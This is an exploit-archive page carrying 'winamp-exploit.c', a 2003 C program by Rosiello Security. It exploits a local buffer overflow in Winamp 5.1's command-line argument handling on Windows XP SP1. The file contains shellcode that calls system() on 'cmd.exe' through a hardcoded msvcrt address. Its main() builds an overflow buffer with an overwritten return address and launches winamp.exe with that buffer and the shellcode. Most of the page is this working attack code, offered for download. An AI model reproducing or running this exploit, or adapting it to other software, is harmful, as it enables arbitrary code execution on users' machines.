exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

winamp-exploit.c

winamp-exploit.c
Posted Dec 31, 2003
Authored by rosiello, Johnny Mast | Site rosiello.org

Local buffer overflow exploit for Winamp version 5.1.

tags | exploit, overflow, local
SHA-256 | f182b48d2c437582583fc964c2c81d32cd54caef71e771fcff223fcbabf8a6c4

winamp-exploit.c

Change Mirror Download
/* 
* Copyright © Rosiello Security
*
* http://www.rosiello.org
*
*
* Winamp_5-1_ex.c (Windows XP Pro + sp1)
* ____ _ _ _ _ _ _ _
* | _ \ ___ ___(_) ___| | | ___ __ _| |_ _| || |_/ |
* | |_) / _ \/ __| |/ _ \ | |/ _ \ / _` | __| |_ .. _| |
* | _ < (_) \__ \ | __/ | | (_) | | (_| | |_ |_ _| |
* |_| \_\___/|___/_|\___|_|_|\___/ \__,_|\__| |_||_| |_|
*
*
* ---[ @Wizard@ local Winamp V5.1 exploiter ]---
*
*
* In December of this year (2003) a good friend of mine "b0f" reported this bug in an advisory
* at www.b0f.net
*
* (BUG:)
*
* There is a simple Buffer overflow in argument handeling routine for Winamp version 5.1.
*
*
*
* just type:
*
*
* C:\\Progra~1\\Winamp\\winamp.exe AAAAAAAAA....[517 chars]...AAAAAAAAAAAA
* winamp.exe will crash
*
*
* This bug was never exploited so that was my quest.
*
* The shellcode requires
*
* system (msvcrt.dll)
*
* AUTHOR : Johnny Mast
* CONTACT: rave@rosiello.org
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <windows.h>
#include <winbase.h>
#define SYS_ADR "\x44\x80\xbf\x77"
#define EIP "\x80\xd4\x12\x00\x00"

char shellcode[]=
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"

"\x8b\xec" // mov ebp,esp
"\x55" // push ebp
"\x68\x65\x78\x65\x20" // push "exe "
"\x68\x63\x6d\x64\x2e" // push "cmd."
"\x8d\x45\xf4" // lea eax,[ebp-0xC]
"\x50" // push eax
"\xb8" SYS_ADR // mov eax,77BF8044h
"\xff\xD0"; // call eax


int main(void)
{
FILE *fd ;
char buffer[1024] ;
char whoops[1024 *2]="C:\\Progra~1\\Winamp\\winamp.exe ";
int i ;

memset( buffer,0x00,1024 ) ;
memset( buffer,0x41,260 ) ;

strcat( buffer,EIP ) ;

execlp(whoops,whoops,buffer,shellcode,NULL);
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close